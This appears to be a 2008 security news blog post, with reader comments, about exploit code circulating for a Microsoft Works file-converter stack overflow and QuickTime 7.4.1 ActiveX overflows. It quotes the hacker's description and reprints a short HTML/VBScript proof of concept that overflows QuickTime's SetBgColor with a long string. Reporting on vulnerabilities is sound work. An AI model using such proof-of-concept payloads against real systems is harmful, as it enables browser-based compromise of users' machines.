No comment on Works, no experience, is it still used much? Reading the history of Zero Day though, it still amazes me that Apple has not been targeted with a class action lawsuit since it mandates the use of one the worst pieces of garbage (in security terms only, maybe it looks great and everyone loves it) software still in use today with it's iPod ecosystem.
What's this, number 70 (as of Sept 2007, there were a total of 61 critical exploit vectors into the OS via QuickTime), so assuming the current rate of ~3 critical vulnerabilities per month...
TripleII
No I am not anti-Apple, or Anti-iPod or whatever, just Anti-QuickTime.
Exploit code for Microsoft Works–which was just patched on Tuesday–and QuickTime is making the rounds.
First up, the Microsoft Works exploit. A hacker dubbed “chujwamwdupe,” who also makes Teletubbies references for giggles, posted the following:
A vulnerability exists in WPS to RTF convert filter that is part of Microsoft Office 2003. It could be exploited by remote attacker to take complete control of an affected system. This issue is due to stack overflow error in function that read secions from WPS file. When we change size of for example TEXT section to number langer than 0×10, stack overflow occurs - very easy to exploit.
The code is also available on Milw0rm. Microsoft had patched this issue with bulletin MS08-011 on Tuesday.
Meanwhile, Laurent Gaffié posted a proof of concept for multiple stack overflow vulnerabilities for QuickTime 7.4.1.
That code, also posted on Milw0rm, is as follows:
Proof of concept example [works with the others functions supplyed in section 2) ] :
<html>
<object classid=’clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B’ id=’foo’ ></object>
<input type=”button” value=”Hit me” language=”VBScript” OnClick=”test()”>
<script language=”VBScript”>
sub test()
bar = String(515305, “A”)
foo.SetBgColor bar
End Sub
</script>
</html>
